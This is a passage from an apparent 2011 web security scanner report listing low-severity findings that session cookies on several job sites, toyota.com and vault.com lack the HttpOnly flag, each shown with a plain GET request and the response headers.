Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rkh4pgjirjhh2qdflm011inei3; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:44 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:44 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 107194

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.131. http://www.sellingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sellingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.sellingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:27 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=u9aug9qog02rlvafs62g9l9651; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:27 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:27 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 130266

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.132. http://www.sqlcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sqlcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.sqlcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:12 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=ic5cgni73m80fllgi2jl24kau2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:12 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:12 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109037

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.133. http://www.teenagercrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.teenagercrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.teenagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:28:56 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=240j3fr7u4qsmuqu986njli7d2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:28:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:28:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 99711

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.134. http://www.telecomcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.telecomcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.telecomcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:55 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=fn27b7rlsvo4speggt7vmuaia6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:56 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:56 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111736

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.135. http://www.toyota.com/byt/pub/init.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.toyota.com
Path:   /byt/pub/init.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /byt/pub/init.do HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Expires: Fri, 21 Jan 2011 18:45:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 18:45:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID_BYT=FmnKN5JDVH1LwGnr9JLPLgMFhjMmjSgmvGhSQhD8ths2YbvThLTq!-1855535020; domain=.toyota.com; path=/
Content-Length: 38510


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...

10.136. http://www.toyota.com/owners/apps/maintenance-guides.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.toyota.com
Path:   /owners/apps/maintenance-guides.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /owners/apps/maintenance-guides.do HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Expires: Fri, 21 Jan 2011 19:53:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 19:53:52 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID_TOYOWN=9VDQN5kQdYfg1qSR7WQVZYPcDGvjYgvWpwPrfSKCQSpjkHTx83GN!-1855535020; path=/
Content-Length: 68207


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

10.137. http://www.toyota.com/owners/apps/manuals.do

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.toyota.com
Path:   /owners/apps/manuals.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set: The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /owners/apps/manuals.do HTTP/1.1
Host: www.toyota.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: dfa_cookie=tmstoyota; s_cc=true; s_vi=[CS]v1|269CEE6C85011498-40000111E00049C8[CE]; s_sq=%5B%5BB%5D%5D; OHVJ=CT; mbox=check#true#1295637814|session#1295637753722-357961#1295639614|PC#1295637753722-357961.17#1296847355;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=ISO-8859-1
Expires: Fri, 21 Jan 2011 19:53:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Fri, 21 Jan 2011 19:53:49 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: JSESSIONID_TOYOWN=1Sj1N5kMLqJFM9x2lj1kLYDzLBh9Mv9Gd012173rFkJNpmlgpGy5!1573505837; path=/
Content-Length: 34028


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"
...[SNIP]...

10.138. http://www.tradingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tradingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tradingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:23:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=pce4hd53hci195b2auvv59a984; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:23:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:23:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 97098

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.139. http://www.trainingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.trainingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.trainingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:41 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0n2gu3r3aojtk5vp93nt6cf8v7; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:41 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:41 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 102452

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.140. http://www.transportationcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.transportationcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.transportationcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=881r6dutr10j1cvgkdbt4hp5m4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 126822

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.141. http://www.travelingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.travelingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.travelingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=n1fl3n2dn89nmcpmn2rdp35b86; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 111343

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.142. http://www.truckingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.truckingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.truckingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:38 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=9omtff16do0dj8ujh5beudm8q4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:38 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:38 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 109322

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.143. http://www.tvcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.tvcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.tvcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:06 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=4enm9d2hf1rq1gm38rib9qh690; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:06 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:06 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101357

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.144. http://www.underwritingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.underwritingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.underwritingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:51 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0or8bng4g6nt9r0eep9e4acqb4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:51 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:51 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 103082

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.145. http://www.vault.com/wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.vault.com
Path:   /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /wps/portal/usa/companies/company-profile/Vinson-&-Elkins-LLP HTTP/1.1
Host: www.vault.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 18:46:04 GMT
Server: IBM_HTTP_Server
IBM-Web2-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Content-Location: /wps/portal/usa/!ut/p/c5/04_SB8K8xLLM9MSSzPy8xBz9CP0os_jgAEMfT3MPIwMDMws3A09fQwtHg1DzIG9PY6B8JLJ8kKOLgaezl3lQsL-XsYGFAQHd4SD7cKswMEOXxzQfJG-AAzga6Pt55Oem6hfkRhhkBqQrAgDiKJ-W/dl3/d3/L2dBISEvZ0FBIS9nQSEh/
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie,Accept-Encoding
Set-Cookie: JSESSIONID=0000rcR5rVICpK5SDIbUDVt8YPK:14a07ck6b; Path=/
Keep-Alive: timeout=10, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
Content-Language: en
Set-Cookie: NSC_xxx.wbvmu.dpn=ffffffffd2d89a9145525d5f4f58455e445a4a423660;expires=Fri, 21-Jan-2011 19:13:07 GMT;path=/
Content-Length: 67073


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script type="text/javascript">var _sf_startpt=(new Dat
...[SNIP]...

10.146. http://www.veterinarycrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.veterinarycrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.veterinarycrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2mcsndiuf3f4gj6u05hhg3jfj5; path=/
